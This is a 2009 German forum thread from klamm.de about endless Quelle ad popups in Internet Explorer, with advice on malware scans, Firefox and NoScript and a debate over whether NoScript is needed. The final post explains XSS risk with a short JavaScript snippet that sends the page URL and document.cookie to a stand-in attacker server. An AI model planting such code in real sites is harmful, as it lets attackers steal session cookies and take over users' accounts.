Zurück   klamm-Forum > klamm.de > klamm talk > Bug-Report

Antwort
 
LinkBack Themen-Optionen Ansicht
Alt 31.08.2009, 10:56:41   #1 (permalink)
Neuer Benutzer

ID: 47962
Lose-Remote

Reg: 31.08.2009
Beiträge: 3
Standard Endlos Popups

habe jetzt schon zum xten Mal Problem mit den Popups gehabt: alle par Sekunden wird ein neues geöffnet. Das betrifft bisher ausschliesslich die Werbung von Quelle. Da hilft dann nur noch beenden der Task und Schliessen aller Explorer Fenster.
 
Online2Hell ist offline   Mit Zitat antworten
Alt 31.08.2009, 12:10:11   #2 (permalink)
Administrator
Benutzerbild von klamm

ID: 20876
Lose-Remote

Reg: 20.04.2006
Beiträge: 11.015
Standard

Das liegt aber nicht an klamm würd ich behaupten.
Was passiert denn dann genau? Geht X mal das Quelle Popup auf?
 
klamm ist offline   Mit Zitat antworten
Alt 31.08.2009, 12:29:56   #3 (permalink)
Neuer Benutzer

ID: 47962
Lose-Remote

Reg: 31.08.2009
Beiträge: 3
Standard

ja genau , das nervt ziemlich, habe ich jetzt schon des öfteren gehabt, aber es ist immer nur von Quelle und dann hab ich ratzfatz 20 fenster offen bis ich endlich mit dem taskmanager den spuk beenden kann
 
Online2Hell ist offline Threadstarter   Mit Zitat antworten
Alt 31.08.2009, 12:31:52   #4 (permalink)
Hüter der Lama's
Benutzerbild von Lamadecke

ID: 359043
Lose-Remote

Lamadecke eine Nachricht über ICQ schicken
Reg: 21.07.2009
Beiträge: 102
Standard

FireFox oder Internet Explorer?
Grüße
 
Lamadecke ist offline   Mit Zitat antworten
Alt 31.08.2009, 12:59:47   #5 (permalink)
Lose 2.0 –
das zweite Zeitalter
Benutzerbild von theHacker

ID: 69505
Lose-Remote

theHacker eine Nachricht über ICQ schicken theHacker eine Nachricht über Skype™ schicken
Reg: 20.04.2006
Beiträge: 22.650
Standard

Zitat:
Zitat von Lamadecke Beitrag anzeigen
FireFox oder Internet Explorer?
Sie hat ja oben "Explorer" geschrieben, also tipp ich mal stark auf Malware. Die hakt sich gern in den IE. Ich kenn da jemanden, der hatte 3 Popups, wenn er auf Google ging

http://www.mozilla-europe.org/de/firefox/
NEU OpenIsles - das freie Insel-Aufbauspiel NEU

www.theHacker.ws v3 | WhatPulse-Team
Bezahlte Startseite
- mehr Verdienst als auf klamm - viele Auszahlungen erhalten
theHacker ist offline   Mit Zitat antworten
Alt 31.08.2009, 13:28:17   #6 (permalink)
Hüter der Lama's
Benutzerbild von Lamadecke

ID: 359043
Lose-Remote

Lamadecke eine Nachricht über ICQ schicken
Reg: 21.07.2009
Beiträge: 102
Standard

Und wenn du den FireFox installierst (vielleicht hast du ihn ja schon) unbedingt das Add-On NoScript installieren.

Such mal das Programm:
Malwarebytes
scannen lassen und log hier posten

Grüße
 

Geändert von Lamadecke (31.08.2009 um 13:30:12 Uhr) Grund: Links eingefügt ;)
Lamadecke ist offline   Mit Zitat antworten
Alt 31.08.2009, 14:16:34   #7 (permalink)
Neuer Benutzer

ID: 47962
Lose-Remote

Reg: 31.08.2009
Beiträge: 3
Standard

Danke für die schnelle Hilfe.

Ich habe hier für Klamm und meine Anbindung an die Firma den IE, hab sonst noch keinen Ärger mit Popups, nur bei der Quelle Reklame,die meistens beim newslesen auf Klamm gestartet wird

muss mal abends auf meinem Rechner probieren, ob das mit dem firefox aufhört
 
Online2Hell ist offline Threadstarter   Mit Zitat antworten
Alt 31.08.2009, 14:30:39   #8 (permalink)
back to the roots
Benutzerbild von birnchen

ID: 134652
Lose-Remote

Reg: 21.04.2006
Beiträge: 11.513
Standard

Zitat:
Zitat von Lamadecke Beitrag anzeigen
unbedingt das Add-On NoScript installieren.
Aus welchem Grund braucht man das soooo unbedingt?

birnchen ist offline   Mit Zitat antworten
Alt 31.08.2009, 14:49:28   #9 (permalink)
Administrator
Benutzerbild von klamm

ID: 20876
Lose-Remote

Reg: 20.04.2006
Beiträge: 11.015
Standard

Zitat:
Zitat von birnchen Beitrag anzeigen
Aus welchem Grund braucht man das soooo unbedingt?
Damit der gesunde Menschenverstand im Ruhezustand verweilen kann.
Ansonsten braucht man es eigentlich nicht.
Achja doch: Um danach nen Thread eröffnen zu können mit
"Nix geht mehr ... ich hab nix gemacht außer NoScript installiert."
 
klamm ist offline   Mit Zitat antworten
Alt 31.08.2009, 14:51:25   #10 (permalink)
back to the roots
Benutzerbild von birnchen

ID: 134652
Lose-Remote

Reg: 21.04.2006
Beiträge: 11.513
Standard

Dann sollte ich das vielleicht auch mal installieren, ich hab so wenig Threads eröffnet in letzter Zeit...

birnchen ist offline   Mit Zitat antworten
Alt 31.08.2009, 14:56:54   #11 (permalink)
Erfahrener Benutzer

ID: 296438
Lose-Remote

paddya eine Nachricht über ICQ schicken paddya eine Nachricht über MSN schicken
Reg: 04.09.2007
Beiträge: 529
Standard

Zitat:
Zitat von klamm Beitrag anzeigen
Damit der gesunde Menschenverstand im Ruhezustand verweilen kann.
Ansonsten braucht man es eigentlich nicht.
Natürlich holst du dir erst vorher jedes HTML-Dokument per telnet, durchwühlst den Quelltext nach irgendwelchen dubiosen Scripts und entscheidest dann, ob du die Seite im Browser öffnen willst. *scnr*

XSS-Lücken gibt es tausende im ganzen Web und auch auf klamm.de können diese auftreten. Wenn dann die Trojaner unters Volk gestreut werden, trifft es meistens zuerst die ganzen IE6-User. Mit NoScript und Firefox hat man immerhin eine zusätzliche Sicherheitsbarriere.

Greetz

paddya
 
paddya ist offline   Mit Zitat antworten
Alt 31.08.2009, 14:58:51   #12 (permalink)
back to the roots
Benutzerbild von birnchen

ID: 134652
Lose-Remote

Reg: 21.04.2006
Beiträge: 11.513
Standard

Man kann sich ja auch einfach von Pornoseiten fernhalten oder nen Antivirenprogramm nutzen.

Irgendwas scheine ich falsch zu machen. Ich hab kein NoScript und krieg trotzdem keine hunderte Popups.

birnchen ist offline   Mit Zitat antworten
Alt 31.08.2009, 15:01:18   #13 (permalink)
Erfahrener Benutzer

ID: 296438
Lose-Remote

paddya eine Nachricht über ICQ schicken paddya eine Nachricht über MSN schicken
Reg: 04.09.2007
Beiträge: 529
Standard

Zitat:
Zitat von birnchen Beitrag anzeigen
Man kann sich ja auch einfach von Pornoseiten fernhalten oder nen Antivirenprogramm nutzen.
Genauso kann man sich von Twitter, Facebook, MySpace und klamm.de fernhalten. Sicherheitslücken gibt es immer. Und wenn jemand deine Cookies stiehlt, dann merkt dein Antivirenprogramm auch nichts davon.
 
paddya ist offline   Mit Zitat antworten
Alt 31.08.2009, 16:40:07   #14 (permalink)
jiw VERIFIZIERTER User
Konto blockiert

ID: 33571
Lose-Remote

Reg: 20.04.2006
Beiträge: 2.643
Standard

Zitat:
Zitat von paddya Beitrag anzeigen
Genauso kann man sich von Twitter, Facebook, MySpace und klamm.de fernhalten. Sicherheitslücken gibt es immer. Und wenn jemand deine Cookies stiehlt, dann merkt dein Antivirenprogramm auch nichts davon.
Richtig, Sicherheitsluecken gibt es immer, wer aber bewusst im Internet surft, hat deutlich weniger Probleme als =Alles-Anklicker= User.

Cookies koennen nur vom ausgebenden Server abgefragt werden.
Sie werden bei Logout automatisch geloescht, bzw sind nicht mehr gueltig bei erneutem Besuch.

Fazit: Wer nicht zu den dauer Login=Usern gehoert und sich regelmaessig abmeldet surft sicherer, dafuer brauch ich keine Noscript=Addons, nur gesunder Meschenverstand.

Gruss,

jiw
 
jiw ist offline   Mit Zitat antworten
Alt 31.08.2009, 17:00:53   #15 (permalink)
Erfahrener Benutzer

ID: 296438
Lose-Remote

paddya eine Nachricht über ICQ schicken paddya eine Nachricht über MSN schicken
Reg: 04.09.2007
Beiträge: 529
Standard

Zitat:
Zitat von jiw Beitrag anzeigen
Cookies koennen nur vom ausgebenden Server abgefragt werden.
Sie werden bei Logout automatisch geloescht, bzw sind nicht mehr gueltig bei erneutem Besuch.
Ja. Man stelle sich aber vor, es gibt eine Lücke im System und folgender Code wird eingeschleust:

PHP-Code:
1:
2:
3:
var img document.createElement('img');
img.src 'http://mein-toller-fremde-cookies-empfangs-server.com/?site=' location.href '&cookie=' document.cookie;
document.appendChild(img); 
Da kann es nur Sekunden dauern und jemand hat automatisiert dein Passwort geändert, sofern der Cookie nicht nur für eine bestimmte IP gültig ist (das ist bei "Remember me"-Cookies meistens nicht der Fall).

Du merkst davon nichts und auch das Ausloggen am Ende hilft dir nicht mehr weiter.

Greetz

paddya

Edit: Nein, das soll jetzt keine Panikmache sein, sondern daraufhin hinweisen, dass eine zusätzliche Barriere nie schaden kann.
 

Geändert von paddya (31.08.2009 um 17:07:09 Uhr)
paddya ist offline   Mit Zitat antworten
Antwort

Gesponsorte Links

Anzeige


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
Pingbacks sind an
Refbacks sind an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
[S] Aktive Refs für crustacean - endlos Lose gustav69 Lose4Refs (erledigt) 48 23.06.2010 16:15:34
Der Xte Mailtauscher 2verschiedene anegbote endlos lose möglich mausilein2 Suche Refs: andere 25 21.05.2009 14:02:55
Werbeplätze, Bonusaktionen, PaidVisit, Paidmails, Paidbanner, Layerviews, Popups, Traffic, Popups ralf2511 Lose4Werbung 35 02.12.2008 21:24:54
[S] Aktive Refs für handymailer - endlos Lose gustav69 Lose4Refs (erledigt) 1 19.08.2008 20:52:05
Suche Refs für Your-Paid/1 Mio. + endlos 500k + Werbebonus Easy2Money Suche Refs: andere 2 12.08.2008 14:59:47


Alle Zeitangaben in WEZ +1. Es ist jetzt 05:37:09 Uhr.